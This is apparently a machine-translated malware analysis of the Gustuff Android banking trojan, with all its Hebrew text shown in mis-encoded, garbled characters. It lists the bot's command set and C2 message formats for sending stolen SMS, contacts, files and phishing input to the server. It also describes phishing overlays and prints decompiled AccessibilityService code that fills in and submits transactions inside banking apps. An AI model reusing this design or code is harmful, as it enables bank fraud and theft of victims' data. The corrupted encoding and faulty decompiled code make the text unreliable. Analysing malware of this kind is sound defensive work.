sendSmsMass ืฉืœื— ื”ื•ื“ืขื•ืช SMS (ื‘ืžื™ื“ืช ื”ืฆื•ืจืš, ื”ื”ื•ื“ืขื” "ืžืคื•ืฆืœืช" ืœื—ืœืงื™ื) ืœืื ืฉื™ ื”ืงืฉืจ ื”ืžืฆื•ื™ื ื™ื ื‘ืคืจืžื˜ืจื™ ื”ืคืงื•ื“ื”. ื”ืžืจื•ื•ื— ื‘ื™ืŸ ืฉืœื™ื—ืช ื”ื•ื“ืขื•ืช ื”ื•ื 10 ืฉื ื™ื•ืช. ื›ืคืจืžื˜ืจ, ื”ืคืงื•ื“ื” ืœื•ืงื—ืช ืžืขืจืš JSON (ืฉื“ื” "sms"), ืฉื”ืจื›ื™ื‘ื™ื ืฉืœื• ืžื›ื™ืœื™ื ืืช ื”ืฉื“ื•ืช "to" - ืžืกืคืจ ื”ื™ืขื“ ื•"ื’ื•ืฃ" - ื’ื•ืฃ ื”ื”ื•ื“ืขื”.
changeServer ืคืงื•ื“ื” ื–ื• ื™ื›ื•ืœื” ืœืงื—ืช ืขืจืš ืขื ื”ืžืคืชื— "url" ื›ืคืจืžื˜ืจ - ื•ืื– ื”ื‘ื•ื˜ ื™ืฉื ื” ืืช ื”ืขืจืš ืฉืœ nameGenerator("SERVER_URL"), ืื• "ืžืขืจืš" - ื•ืื– ื”ื‘ื•ื˜ ื™ื›ืชื•ื‘ ืืช ื”ืžืขืจืš ืœ-nameGenerator ("API_SERVER_LIST"). ืœืคื™ื›ืš, ื”ืืคืœื™ืงืฆื™ื” ืžืฉื ื” ืืช ื”ื›ืชื•ื‘ืช ืฉืœ ืฉืจืชื™ ื”-CnC.
adminNumber ื”ืคืงื•ื“ื” ื ื•ืขื“ื” ืœืขื‘ื•ื“ ืขื ืžืกืคืจ ืฉื•ืจืฉ. ื”ืคืงื•ื“ื” ืžืงื‘ืœืช ืื•ื‘ื™ื™ืงื˜ JSON ืขื ื”ืคืจืžื˜ืจื™ื ื”ื‘ืื™ื: "number" - ืฉื ื” ืฉืGenerator("ROOT_NUMBER") ืœืขืจืš ืฉื”ืชืงื‘ืœ, "ืฉืœื— ืžื—ื“ืฉ" - ืฉื ื” ืฉืGenerator("SMS_ROOT_NUMBER_RESEND"), "sendId" - ืฉืœื— ืœ-nameGenerator("ROOT_NUMBER" ) ืžื–ื”ื” ื™ื™ื—ื•ื“ื™.
ืขื“ื›ืŸ ืžื™ื“ืข ืฉืœื— ืžื™ื“ืข ืขืœ ื”ืžื›ืฉื™ืจ ื”ื ื’ื•ืข ืœืฉืจืช.
wipeData ื”ืคืงื•ื“ื” ื ื•ืขื“ื” ืœืžื—ื•ืง ื ืชื•ื ื™ ืžืฉืชืžืฉ. ืชืœื•ื™ ื‘ืื™ื–ื” ืฉื ื”ืืคืœื™ืงืฆื™ื” ื”ื•ืฉืงื”, ืื• ืฉื”ื ืชื•ื ื™ื ื ืžื—ืงื™ื ืœื—ืœื•ื˜ื™ืŸ ืขื ืืชื—ื•ืœ ืžื—ื“ืฉ ืฉืœ ื”ืžื›ืฉื™ืจ (ืžืฉืชืžืฉ ืจืืฉื™), ืื• ืฉืจืง ื ืชื•ื ื™ ืžืฉืชืžืฉ ื ืžื—ืงื™ื (ืžืฉืชืžืฉ ืžืฉื ื™).
socksStart ื”ืคืขืœ ืืช ืžื•ื“ื•ืœ ื”-Proxy. ืคืขื•ืœืช ื”ืžื•ื“ื•ืœ ืžืชื•ืืจืช ื‘ืกืขื™ืฃ ื ืคืจื“.
ื’ืจื‘ื™ื™ื ืกื˜ื•ืค ืขืฆื•ืจ ืืช ืžื•ื“ื•ืœ ื”-Proxy.
openLink ืขืงื•ื‘ ืื—ืจ ื”ืงื™ืฉื•ืจ. ื”ืงื™ืฉื•ืจ ืžืžื•ืงื ื‘ืคืจืžื˜ืจ JSON ืžืชื—ืช ืœืžืคืชื— "url". "android.intent.action.VIEW" ืžืฉืžืฉ ืœืคืชื™ื—ืช ื”ืงื™ืฉื•ืจ.
uploadAllSms ืฉืœื— ืืช ื›ืœ ื”ื•ื“ืขื•ืช ื”-SMS ืฉื”ืžื›ืฉื™ืจ ืงื™ื‘ืœ ืœืฉืจืช.
ื”ืขืœื” ืืช ื›ืœ ื”ืชืžื•ื ื•ืช ืฉืœื— ืชืžื•ื ื•ืช ืžืžื›ืฉื™ืจ ื ื’ื•ืข ืœื›ืชื•ื‘ืช URL. ื›ืชื•ื‘ืช ื”ืืชืจ ืžื’ื™ืขื” ื›ืคืจืžื˜ืจ.
ื”ืขืœื” ืงื•ื‘ืฅ ืฉืœื— ืงื•ื‘ืฅ ืœื›ืชื•ื‘ืช URL ืžืžื›ืฉื™ืจ ื ื’ื•ืข. ื›ืชื•ื‘ืช ื”ืืชืจ ืžื’ื™ืขื” ื›ืคืจืžื˜ืจ.
ื”ืขืœื” ืžืกืคืจื™ ื˜ืœืคื•ืŸ ืฉืœื— ืžืกืคืจื™ ื˜ืœืคื•ืŸ ืžืจืฉื™ืžืช ืื ืฉื™ ื”ืงืฉืจ ืฉืœืš ืœืฉืจืช. ืื ืขืจืš ืื•ื‘ื™ื™ืงื˜ JSON ืขื ื”ืžืคืชื— "ab" ืžืชืงื‘ืœ ื›ืคืจืžื˜ืจ, ื”ืืคืœื™ืงืฆื™ื” ืžืงื‘ืœืช ืจืฉื™ืžื” ืฉืœ ืื ืฉื™ ืงืฉืจ ืžืกืคืจ ื”ื˜ืœืคื•ื ื™ื. ืื ืื•ื‘ื™ื™ืงื˜ JSON ืขื ื”ืžืคืชื— "sms" ืžืชืงื‘ืœ ื›ืคืจืžื˜ืจ, ื”ืืคืœื™ืงืฆื™ื” ืงื•ืจืืช ืืช ืจืฉื™ืžืช ืื ืฉื™ ื”ืงืฉืจ ืžืฉื•ืœื—ื™ ื”ื•ื“ืขื•ืช ื”-SMS.
changeArchive ื”ืืคืœื™ืงืฆื™ื” ืžื•ืจื™ื“ื” ืืช ื”ืงื•ื‘ืฅ ืžื”ื›ืชื•ื‘ืช ืฉืžื’ื™ืขื” ื›ืคืจืžื˜ืจ ื‘ืืžืฆืขื•ืช ืžืงืฉ "url". ื”ืงื•ื‘ืฅ ืฉื”ื•ืจื“ ื ืฉืžืจ ื‘ืฉื "archive.zip". ืœืื—ืจ ืžื›ืŸ, ื”ื™ื™ืฉื•ื ื™ืคืชื— ืืช ื”ืงื•ื‘ืฅ, ืื•ืคืฆื™ื•ื ืœื™ ื‘ืืžืฆืขื•ืช ืกื™ืกืžืช ื”ืืจื›ื™ื•ืŸ "b5jXh37gxgHBrZhQ4j3D". ื”ืงื‘ืฆื™ื ืฉื ืคืจืžื• ื ืฉืžืจื™ื ื‘ืกืคืจื™ื™ืช [ืื—ืกื•ืŸ ื—ื™ืฆื•ื ื™]/hgps. ื‘ืกืคืจื™ื™ื” ื–ื•, ื”ืืคืœื™ืงืฆื™ื” ืžืื—ืกื ืช ื–ื™ื•ืคื™ ืื™ื ื˜ืจื ื˜ (ืžืชื•ืืจ ืœื”ืœืŸ).
ืคืขื•ืœื•ืช ื”ืคืงื•ื“ื” ื ื•ืขื“ื” ืœืขื‘ื•ื“ ืขื Action Service, ื”ืžืชื•ืืจ ื‘ืกืขื™ืฃ ื ืคืจื“.
ืžื‘ื—ืŸ ืœื ืขื•ืฉื” ื“ื‘ืจ.
ืœื”ื•ืจื“ื” ื”ืคืงื•ื“ื” ื ื•ืขื“ื” ืœื”ื•ืจื™ื“ ืงื•ื‘ืฅ ืžืฉืจืช ืžืจื•ื—ืง ื•ืœืฉืžื•ืจ ืื•ืชื• ื‘ืกืคืจื™ื™ืช "ื”ื•ืจื“ื•ืช". ื›ืชื•ื‘ืช ื”-URL ื•ืฉื ื”ืงื•ื‘ืฅ ืžื’ื™ืขื™ื ื›ืคืจืžื˜ืจ, ืฉื“ื•ืช ื‘ืื•ื‘ื™ื™ืงื˜ ื”ืคืจืžื˜ืจ JSON, ื‘ื”ืชืืžื”: "url" ื•-"fileName".
ืœื”ืกื™ืจ ืžืกื™ืจ ืงื•ื‘ืฅ ืžื”ืกืคืจื™ื™ื” "ื”ื•ืจื“ื•ืช". ืฉื ื”ืงื•ื‘ืฅ ืžื’ื™ืข ื‘ืคืจืžื˜ืจ JSON ืขื ืžืงืฉ "fileName". ืฉื ื”ืงื•ื‘ืฅ ื”ืกื˜ื ื“ืจื˜ื™ ื”ื•ื "tmp.apk".
ื”ื•ื“ืขื” ื”ืฆื’ ื”ืชืจืื” ืขื ื˜ืงืกื˜ื™ื ืฉืœ ืชื™ืื•ืจ ื•ื›ื•ืชืจืช ืฉื”ื•ื’ื“ืจื• ืขืœ ื™ื“ื™ ืฉืจืช ื”ื ื™ื”ื•ืœ.

ืคื•ืจืžื˜ ืคืงื•ื“ื” ื”ื•ื“ืขื”:

{
    "results" : "OK",
    "command":{
    "id": <%id%>,
    "command":"notification",
    "timestamp":<%Server Timestamp%>,
    "params":{
        "openApp":<%Open original app or not%>,
        "array":[
                      {"title":<%Title text%>,
                      "desc":<%Description text%>,
                      "app":<%Application name%>}
                   ]
                   },
        },
}

ื”ื”ื•ื“ืขื” ืฉื ื•ืฆืจื” ืขืœ ื™ื“ื™ ื”ืงื•ื‘ืฅ ื”ื ื—ืงืจ ื ืจืื™ืช ื–ื”ื” ืœื”ื•ื“ืขื•ืช ืฉื ื•ืฆืจื• ืขืœ ื™ื“ื™ ื”ืืคืœื™ืงืฆื™ื” ืฉืฆื•ื™ื ื” ื‘ืฉื“ื” ื”ืืคืœื™ืงืฆื™ื”. ืื ืขืจืš ื”ืฉื“ื” ืืคืœื™ืงืฆื™ื” ืคืชื•ื—ื” - ื ื›ื•ืŸ, ื›ืืฉืจ ื ืคืชื—ืช ื”ื•ื“ืขื”, ื”ืืคืœื™ืงืฆื™ื” ื”ืžืฆื•ื™ื ืช ื‘ืฉื“ื” ืžื•ืคืขืœืช ื”ืืคืœื™ืงืฆื™ื”. ืื ืขืจืš ื”ืฉื“ื” ืืคืœื™ืงืฆื™ื” ืคืชื•ื—ื” - ืฉืงืจ, ืื ื›ืŸ:

  • ื ืคืชื— ื—ืœื•ืŸ ื“ื™ื•ื’, ืฉืชื•ื›ื ื• ืžื•ืจื™ื“ื™ื ืžื”ืกืคืจื™ื™ื” <%ืื—ืกื•ืŸ ื—ื™ืฆื•ื ื™%>/hgps/<%filename%>
  • ื ืคืชื— ื—ืœื•ืŸ ืคื™ืฉื™ื ื’, ืฉืชื•ื›ื ื• ืžื•ืจื™ื“ื™ื ืžื”ืฉืจืช <%url%>?id=<%Bot id%>&app=<%Application name%>
  • ื ืคืชื— ื—ืœื•ืŸ ื“ื™ื•ื’, ื‘ืžืกื•ื•ื” ืฉืœ ื›ืจื˜ื™ืก Google Play, ืขื ืืคืฉืจื•ืช ืœื”ื–ื™ืŸ ืคืจื˜ื™ ื›ืจื˜ื™ืก.

ื”ืืคืœื™ืงืฆื™ื” ืฉื•ืœื—ืช ืืช ื”ืชื•ืฆืื” ืฉืœ ื›ืœ ืคืงื•ื“ื” ืืœ <%CnC%>set_state.php ื›ืื•ื‘ื™ื™ืงื˜ JSON ื‘ืคื•ืจืžื˜ ื”ื‘ื:

{
    "command":
    {
        "command":<%command%>,
        "id":<%command_id%>,
        "state":<%command_state%>
    }
    "id":<%bot_id%>
}

ActionsService
ืจืฉื™ืžืช ื”ืคืงื•ื“ื•ืช ืฉื”ืืคืœื™ืงืฆื™ื” ืžืขื‘ื“ืช ื›ื•ืœืœืช ืคืขื•ืœื”. ื›ืืฉืจ ืžืชืงื‘ืœืช ืคืงื•ื“ื”, ืžื•ื“ื•ืœ ืขื™ื‘ื•ื“ ื”ืคืงื•ื“ื•ืช ื ื™ื’ืฉ ืœืฉื™ืจื•ืช ื–ื” ื›ื“ื™ ืœื‘ืฆืข ืืช ื”ืคืงื•ื“ื” ื”ืžื•ืจื—ื‘ืช. ื”ืฉื™ืจื•ืช ืžืงื‘ืœ ืื•ื‘ื™ื™ืงื˜ JSON ื›ืคืจืžื˜ืจ. ื”ืฉื™ืจื•ืช ื™ื›ื•ืœ ืœื‘ืฆืข ืืช ื”ืคืงื•ื“ื•ืช ื”ื‘ืื•ืช:

1. PARAMS_ACTION - ื‘ืขืช ืงื‘ืœืช ืคืงื•ื“ื” ื›ื–ื•, ื”ืฉื™ืจื•ืช ืžืงื‘ืœ ืชื—ื™ืœื” ืžืคืจืžื˜ืจ JSON ืืช ื”ืขืจืš ืฉืœ ืžืคืชื— Type, ืฉื™ื›ื•ืœ ืœื”ื™ื•ืช ื›ื“ืœืงืžืŸ:

  • serviceInfo - ืคืงื•ื“ืช ื”ืžืฉื ื” ืžืงื‘ืœืช ืืช ื”ืขืจืš ืœืคื™ ืžืคืชื— ืžืคืจืžื˜ืจ JSON includeNotImportant. ืื ื”ื“ื’ืœ ื”ื•ื True, ื”ืืคืœื™ืงืฆื™ื” ืžื’ื“ื™ืจื” ืืช ื”ื“ื’ืœ FLAG_ISOLATED_PROCESS ืœืฉื™ืจื•ืช ื”ืžืฉืชืžืฉ ื‘ืฉื™ืจื•ืช ื”ื ื’ื™ืฉื•ืช. ื›ืš ื”ืฉื™ืจื•ืช ื™ื•ืฉืง ื‘ืชื”ืœื™ืš ื ืคืจื“.
  • ืฉื•ืจืฉ - ืงื‘ืœ ื•ืฉืœื— ืœืฉืจืช ืžื™ื“ืข ืขืœ ื”ื—ืœื•ืŸ ืฉื ืžืฆื ื›ืขืช ื‘ืคื•ืงื•ืก. ื”ืืคืœื™ืงืฆื™ื” ืžืฉื™ื’ื” ืžื™ื“ืข ื‘ืืžืฆืขื•ืช ื”ืžื—ืœืงื” AccessibilityNodeInfo.
  • ืžื ื”ืœ - ื‘ืงืฉ ื–ื›ื•ื™ื•ืช ืžื ื”ืœ.
  • ืขื™ื›ื•ื‘ - ืœื”ืฉืขื•ืช ืืช ActionsService ืœืžืกืคืจ ื”ืืœืคื™ื•ืช ืฉืฆื•ื™ืŸ ื‘ืคืจืžื˜ืจ ืขื‘ื•ืจ ืžืคืชื— "ื ืชื•ื ื™ื".
  • ื—ืœื•ื ื•ืช - ืฉืœื— ืจืฉื™ืžื” ืฉืœ ื—ืœื•ื ื•ืช ื’ืœื•ื™ื™ื ืœืžืฉืชืžืฉ.
  • ืœื”ืชืงื™ืŸ - ื”ืชืงืŸ ืืช ื”ืืคืœื™ืงืฆื™ื” ื‘ืžื›ืฉื™ืจ ื”ื ื’ื•ืข. ืฉื ื—ื‘ื™ืœืช ื”ืืจื›ื™ื•ืŸ ื ืžืฆื ื‘ืžืงืฉ "ืฉื ืงื•ื‘ืฅ". ื”ืืจื›ื™ื•ืŸ ืขืฆืžื• ืžืžื•ืงื ื‘ืกืคืจื™ื™ืช ื”ื”ื•ืจื“ื•ืช.
  • ื’ืœื•ึนื‘ึผึธืœึดื™ - ืคืงื•ื“ืช ื”ืžืฉื ื” ื ื•ืขื“ื” ืœื ื•ื•ื˜ ืžื”ื—ืœื•ืŸ ื”ื ื•ื›ื—ื™:
    • ื‘ืชืคืจื™ื˜ ื”ื”ื’ื“ืจื•ืช ื”ืžื”ื™ืจื•ืช
    • ืื—ื•ืจื”
    • ื‘ื™ืช
    • ืœื”ืชืจืื•ืช
    • ืœื—ืœื•ืŸ ื”ื™ื™ืฉื•ืžื™ื ืฉื ืคืชื— ืœืื—ืจื•ื ื”

  • ืœืฉื’ืจ - ื”ืคืขืœ ืืช ื”ืืคืœื™ืงืฆื™ื”. ืฉื ื”ืืคืœื™ืงืฆื™ื” ืžื’ื™ืข ื›ืคืจืžื˜ืจ ืœืคื™ ืžืคืชื— ื ืชื•ื ื™ื.
  • ืฆืœื™ืœื™ื - ืฉื ื” ืืช ืžืฆื‘ ื”ืงื•ืœ ืœืฉืงื˜.
  • ืœืคืชื•ื— - ืžื“ืœื™ืง ืืช ื”ืชืื•ืจื” ื”ืื—ื•ืจื™ืช ืฉืœ ื”ืžืกืš ื•ื”ืžืงืœื“ืช ืœื‘ื”ื™ืจื•ืช ืžืœืื”. ื”ืืคืœื™ืงืฆื™ื” ืžื‘ืฆืขืช ืคืขื•ืœื” ื–ื• ื‘ืืžืฆืขื•ืช WakeLock, ื•ืžืฆื™ื™ื ืช ืืช ื”ืžื—ืจื•ื–ืช [ืชื•ื•ื™ืช ื”ืืคืœื™ืงืฆื™ื”]:INFO ื›ืชื’
  • permissionOverlay โ€” ื”ืคื•ื ืงืฆื™ื” ืœื ืžื™ื•ืฉืžืช (ื”ืชื’ื•ื‘ื” ืœื‘ื™ืฆื•ืข ื”ืคืงื•ื“ื” ื”ื™ื {"message":"Not support"} ืื• {"message":"low sdk"})
  • ืžื—ื•ื•ื” โ€” ื”ืคื•ื ืงืฆื™ื” ืื™ื ื” ืžื™ื•ืฉืžืช (ื”ืชื’ื•ื‘ื” ืœื‘ื™ืฆื•ืข ื”ืคืงื•ื“ื” ื”ื™ื {"message":"Not support"}ืื• {"message":"Low API"})
  • ื”ืจืฉืื•ืช - ืคืงื•ื“ื” ื–ื• ื ื—ื•ืฆื” ื›ื“ื™ ืœื‘ืงืฉ ื”ืจืฉืื•ืช ืขื‘ื•ืจ ื”ื™ื™ืฉื•ื. ืขื ื–ืืช, ืคื•ื ืงืฆื™ื™ืช ื”ืฉืื™ืœืชื” ืื™ื ื” ืžื™ื•ืฉืžืช, ื›ืš ืฉื”ืคืงื•ื“ื” ื—ืกืจืช ืžืฉืžืขื•ืช. ืจืฉื™ืžืช ื”ื–ื›ื•ื™ื•ืช ื”ืžื‘ื•ืงืฉื•ืช ืžื’ื™ืขื” ื›ืžืขืจืš JSON ืขื ืžืงืฉ "ื”ืจืฉืื•ืช". ืจืฉื™ืžื” ืกื˜ื ื“ืจื˜ื™ืช:
    • android.permission.READ_PHONE_STATE
    • android.permission.READ_CONTACTS
    • android.permission.CALL_PHONE
    • android.permission.RECEIVE_SMS
    • android.permission.SEND_SMS
    • android.permission.READ_SMS
    • android.permission.READ_EXTERNAL_STORAGE
    • android.permission.WRITE_EXTERNAL_STORAGE

  • ืœืคืชื•ื— - ื”ืฆื’ ื—ืœื•ืŸ ื“ื™ื•ื’. ื‘ื”ืชืื ืœืคืจืžื˜ืจ ื”ืžื’ื™ืข ืžื”ืฉืจืช, ื”ืืคืœื™ืงืฆื™ื” ืขืฉื•ื™ื” ืœื”ืฆื™ื’ ืืช ื—ืœื•ื ื•ืช ื”ื”ืชื—ื–ื•ืช ื”ื‘ืื™ื:
    • ื”ืฆื’ ื—ืœื•ืŸ ื“ื™ื•ื’ ืฉืชื•ื›ื ื• ื›ืชื•ื‘ ื‘ืงื•ื‘ืฅ ื‘ืกืคืจื™ื” <%ืกืคืจื™ื™ื” ื—ื™ืฆื•ื ื™ืช%>/hgps/<%param_filename%>. ืชื•ืฆืืช ื”ืื™ื ื˜ืจืืงืฆื™ื” ืฉืœ ื”ืžืฉืชืžืฉ ืขื ื”ื—ืœื•ืŸ ืชื™ืฉืœื— ืืœ <%CnC%>/records.php
    • ื”ืฆื’ ื—ืœื•ืŸ ื“ื™ื•ื’ ืฉื”ืชื•ื›ืŸ ืฉืœื• ื ื˜ืขืŸ ืžืจืืฉ ืžื”ื›ืชื•ื‘ืช <%url_param%>?id=<%bot_id%>&app=<%packagename%>. ืชื•ืฆืืช ื”ืื™ื ื˜ืจืืงืฆื™ื” ืฉืœ ื”ืžืฉืชืžืฉ ืขื ื”ื—ืœื•ืŸ ืชื™ืฉืœื— ืืœ <%CnC%>/records.php
    • ื”ืฆื’ ื—ืœื•ืŸ ื“ื™ื•ื’ ื‘ืžืกื•ื•ื” ืฉืœ ื›ืจื˜ื™ืก Google Play.

  • ืื™ื ื˜ืจืืงื˜ื™ื‘ื™ - ื”ืคืงื•ื“ื” ื ื•ืขื“ื” ืœืงื™ื™ื ืื™ื ื˜ืจืืงืฆื™ื” ืขื ืจื›ื™ื‘ื™ ื—ืœื•ืŸ ืฉืœ ื™ื™ืฉื•ืžื™ื ืื—ืจื™ื ื‘ืืžืฆืขื•ืช AcessibilityService. ืฉื™ืจื•ืช ืžื™ื•ื—ื“ ื”ื•ืคืขืœ ื‘ืชื•ื›ื ื™ืช ืœืื™ื ื˜ืจืืงืฆื™ื”. ื”ืืคืœื™ืงืฆื™ื” ื”ื ื—ืงืจืช ื™ื›ื•ืœื” ืœื™ืฆื•ืจ ืื™ื ื˜ืจืืงืฆื™ื” ืขื ื—ืœื•ื ื•ืช:
    • ืคืขื™ืœ ื›ืจื’ืข. ื‘ืžืงืจื” ื–ื”, ื”ืคืจืžื˜ืจ ืžื›ื™ืœ ืืช ื”ืžื–ื”ื” ืื• ื”ื˜ืงืกื˜ (ืฉื) ืฉืœ ื”ืื•ื‘ื™ื™ืงื˜ ืฉืื™ืชื• ืืชื” ืฆืจื™ืš ืœืงื™ื™ื ืื™ื ื˜ืจืืงืฆื™ื”.
    • ื’ืœื•ื™ ืœืžืฉืชืžืฉ ื‘ื–ืžืŸ ื‘ื™ืฆื•ืข ื”ืคืงื•ื“ื”. ื”ื™ื™ืฉื•ื ื‘ื•ื—ืจ ื—ืœื•ื ื•ืช ืœืคื™ ืžื–ื”ื”.

    ืœืื—ืจ ืงื‘ืœืช ื—ืคืฆื™ื AccessibilityNodeInfo ืขื‘ื•ืจ ืจื›ื™ื‘ื™ ื—ืœื•ืŸ ืžืขื ื™ื™ื ื™ื, ื”ืืคืœื™ืงืฆื™ื”, ื‘ื”ืชืื ืœืคืจืžื˜ืจื™ื, ื™ื›ื•ืœื” ืœื‘ืฆืข ืืช ื”ืคืขื•ืœื•ืช ื”ื‘ืื•ืช:

    • ืคื•ืงื•ืก - ื”ื’ื“ืจ ืืช ื”ืžื™ืงื•ื“ ืœืื•ื‘ื™ื™ืงื˜.
    • ืœื—ืฅ - ืœื—ืฅ ืขืœ ืื•ื‘ื™ื™ืงื˜.
    • actionId - ื‘ืฆืข ืคืขื•ืœื” ืœืคื™ ID.
    • setText - ืฉื ื” ืืช ื”ื˜ืงืกื˜ ืฉืœ ืื•ื‘ื™ื™ืงื˜. ืฉื™ื ื•ื™ ื”ื˜ืงืกื˜ ืืคืฉืจื™ ื‘ืฉืชื™ ื“ืจื›ื™ื: ื‘ื™ืฆื•ืข ืคืขื•ืœื” ACTION_SET_TEXT (ืื ื’ืจืกืช ื”ืื ื“ืจื•ืื™ื“ ืฉืœ ื”ืžื›ืฉื™ืจ ื”ื ื’ื•ืข ืฆืขื™ืจื” ืื• ืฉื•ื•ื” ืœ LOLLIPOP), ืื• ืขืœ ื™ื“ื™ ื”ื ื—ืช ืžื—ืจื•ื–ืช ืขืœ ื”ืœื•ื— ื•ื”ื“ื‘ืงื” ื‘ืื•ื‘ื™ื™ืงื˜ (ืœื’ืจืกืื•ืช ื™ืฉื ื•ืช ื™ื•ืชืจ). ื ื™ืชืŸ ืœื”ืฉืชืžืฉ ื‘ืคืงื•ื“ื” ื–ื• ื›ื“ื™ ืœืฉื ื•ืช ื ืชื•ื ื™ื ื‘ืืคืœื™ืงืฆื™ื” ื‘ื ืงืื™ืช.

2. PARAMS_ACTIONS - ื›ืžื• PARAMS_ACTION, ืžื’ื™ืข ืจืง ืžืขืจืš JSON ืฉืœ ืคืงื•ื“ื•ืช.

ื ืจืื” ืฉืื ืฉื™ื ืจื‘ื™ื ื™ืชืขื ื™ื™ื ื• ื›ื™ืฆื“ ื ืจืื™ืช ื”ืคื•ื ืงืฆื™ื” ืฉืœ ืื™ื ื˜ืจืืงืฆื™ื” ืขื ืจื›ื™ื‘ื™ ื—ืœื•ืŸ ืฉืœ ืืคืœื™ืงืฆื™ื” ืื—ืจืช. ื›ืš ืžื™ื•ืฉืžืช ื”ืคื•ื ืงืฆื™ื•ื ืœื™ื•ืช ื”ื–ื• ื‘-Gustuff:

boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
    int count = action.optInt("repeat", 1);
    Iterator aiListIterator = ((Iterable)aiList).iterator();
    int count = 0;
    while(aiListIterator.hasNext()) {
        Object ani = aiListIterator.next();
        if(1 <= count) {
            int index;
            for(index = 1; true; ++index) {
                if(action.has("focus")) {
                    if(((AccessibilityNodeInfo)ani).performAction(1)) {
                        ++count;
                    }
                }
                else if(action.has("click")) {
                    if(((AccessibilityNodeInfo)ani).performAction(16)) {
                        ++count;
                    }
                }
                else if(action.has("actionId")) {
                    if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
                        ++count;
                    }
                }
                else if(action.has("setText")) {
                    customHeader ch = CustomAccessibilityService.a;
                    Context context = this.getApplicationContext();
                    String text = action.optString("setText");
                    if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
                        ++count;
                    }
                }
                if(index == count) {
                    break;
                }
            }
        }
        ((AccessibilityNodeInfo)ani).recycle();
    }
    res.addPropertyNumber("res", Integer.valueOf(count));
}

ืคื•ื ืงืฆื™ื™ืช ื”ื—ืœืคืช ื˜ืงืกื˜:

boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
    boolean result;
    if(Build$VERSION.SDK_INT >= 21) {
        Bundle b = new Bundle();
        b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
        result = ani.performAction(0x200000, b);  // ACTION_SET_TEXT
    }
    else {
        Object clipboard = context.getSystemService("clipboard");
        if(clipboard != null) {
        ((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
        result = ani.performAction(0x8000);  // ACTION_PASTE
        }
        else {
            result = false;
        }
    }
    return result;
}

ื›ืš, ืขื ืชืฆื•ืจื” ื ื›ื•ื ื” ืฉืœ ืฉืจืช ื”ื‘ืงืจื”, Gustuff ืžืกื•ื’ืœืช ืœืžืœื ืฉื“ื•ืช ื˜ืงืกื˜ ื‘ืืคืœื™ืงืฆื™ื™ืช ื”ื‘ื ืงืื•ืช ื•ืœืœื—ื•ืฅ ืขืœ ื”ื›ืคืชื•ืจื™ื ื”ื“ืจื•ืฉื™ื ืœื”ืฉืœืžืช ื”ืขืกืงื”. ื”ื˜ืจื•ื™ืื ื™ ืืคื™ืœื• ืœื ืฆืจื™ืš ืœื”ื™ื›ื ืก ืœืืคืœื™ืงืฆื™ื” - ืžืกืคื™ืง ืœืฉืœื•ื— ืคืงื•ื“ื” ื›ื“ื™ ืœื”ืฆื™ื’ ื”ื•ื“ืขืช PUSH ื•ืื– ืœืคืชื•ื— ืืช ืืคืœื™ืงืฆื™ื™ืช ื”ื‘ื ืงืื•ืช ืฉื”ื•ืชืงื ื” ืงื•ื“ื ืœื›ืŸ. ื”ืžืฉืชืžืฉ ื™ืืžืช ืืช ืขืฆืžื•, ื•ืœืื—ืจ ืžื›ืŸ ื™ื•ื›ืœ Gustuff ืœืžืœื ืืช ื”ืžื›ื•ื ื™ืช.

ืžื•ื“ื•ืœ ืขื™ื‘ื•ื“ ื”ื•ื“ืขื•ืช SMS

ื”ื™ื™ืฉื•ื ืžืชืงื™ืŸ ืžื˜ืคืœ ื‘ืื™ืจื•ืขื™ื ืขื‘ื•ืจ ื”ืžื›ืฉื™ืจ ื”ื ื’ื•ืข ื›ื“ื™ ืœืงื‘ืœ ื”ื•ื“ืขื•ืช SMS. ื”ืืคืœื™ืงืฆื™ื” ื”ื ื‘ื“ืงืช ื™ื›ื•ืœื” ืœืงื‘ืœ ืคืงื•ื“ื•ืช ืžื”ืžืคืขื™ืœ, ื”ืžื’ื™ืขื•ืช ื‘ื’ื•ืฃ ื”ื•ื“ืขืช ื”-SMS. ื”ืคืงื•ื“ื•ืช ืžื’ื™ืขื•ืช ื‘ืคื•ืจืžื˜:

7!5=<ืคืงื•ื“ื” ืžืงื•ื“ื“ืช%Base64%>

ื”ืืคืœื™ืงืฆื™ื” ืžื—ืคืฉืช ืืช ื”ืžื—ืจื•ื–ืช ื‘ื›ืœ ื”ื•ื“ืขื•ืช ื”-SMS ื”ื ื›ื ืกื•ืช 7!5=, ื›ืืฉืจ ืžื—ืจื•ื–ืช ืžื–ื•ื”ื”, ื”ื•ื ืžืคืขื ื— ืืช ื”ืžื—ืจื•ื–ืช ืž-Base64 ื‘ื”ื™ืกื˜ 4 ื•ืžื‘ืฆืข ืืช ื”ืคืงื•ื“ื”. ื”ืคืงื•ื“ื•ืช ื“ื•ืžื•ืช ืœืืœื• ืขื CnC. ืชื•ืฆืืช ื”ื‘ื™ืฆื•ืข ื ืฉืœื—ืช ืœืื•ืชื• ืžืกืคืจ ืฉืžืžื ื• ื”ื’ื™ืขื” ื”ืคืงื•ื“ื”. ืคื•ืจืžื˜ ืชื’ื•ื‘ื”:

7*5=<ืงื™ื“ื•ื“%Base64 ืฉืœ "ืคืงื•ื“ื” ืชื•ืฆืื”_ืงื•ื“"%>

ืœื—ืœื•ืคื™ืŸ, ื”ืืคืœื™ืงืฆื™ื” ื™ื›ื•ืœื” ืœืฉืœื•ื— ืืช ื›ืœ ื”ื”ื•ื“ืขื•ืช ืฉื”ืชืงื‘ืœื• ืœืžืกืคืจ ื”ืฉื•ืจืฉ. ืœืฉื ื›ืš, ื™ืฉ ืœืฆื™ื™ืŸ ืืช ืžืกืคืจ ื”ืฉื•ืจืฉ ื‘ืงื•ื‘ืฅ ื”ื”ืขื“ืคื•ืช ื•ืœื”ื’ื“ื™ืจ ืืช ื“ื’ืœ ื”ืคื ื™ื™ืช ื”ื”ื•ื“ืขื”. ื”ื•ื“ืขืช SMS ื ืฉืœื—ืช ืœืžืกืคืจ ืฉืœ ื”ืชื•ืงืฃ ื‘ืคื•ืจืžื˜:

<%From number%> - <%Time, format: dd/MM/yyyy HH:mm:ss%> <%SMS body%>

